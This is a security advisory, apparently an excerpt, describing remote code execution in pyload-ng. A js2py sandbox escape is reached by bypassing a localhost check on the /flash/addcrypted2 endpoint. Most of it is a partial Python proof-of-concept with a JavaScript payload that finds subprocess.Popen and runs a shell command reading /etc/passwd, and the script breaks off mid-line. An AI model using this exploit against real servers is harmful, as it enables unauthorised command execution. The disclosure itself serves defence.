Summary Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately. Details js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the /flash/addcrypted2 API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE. PoC The PoC is provided as poc.py below, you can modify the shell command it execute: “`python import socket import base64 from urllib.parse import quote host, port = input("host: "), int(input("port: ")) payload = """ // [+] command goes here: let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator;" let hacked, bymarve, n11 let getattr, obj hacked = Object.getOwnPropertyNames({}) bymarve = hacked.getattribute n11 = bymarve("getattribute") obj = n11("class").base getattr = obj.getattribute function findpopen(o) { let result; for(let i in o.subclasses()) { let item = o.subclasses()[i] if(item.module == "subprocess" && item.name == "Popen") { return item } if(item.name != "type" && (result = findpopen(item))) { return result } } } n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate() console.log(n11) function f() { return n11 } """ crypted_b64 =…Read More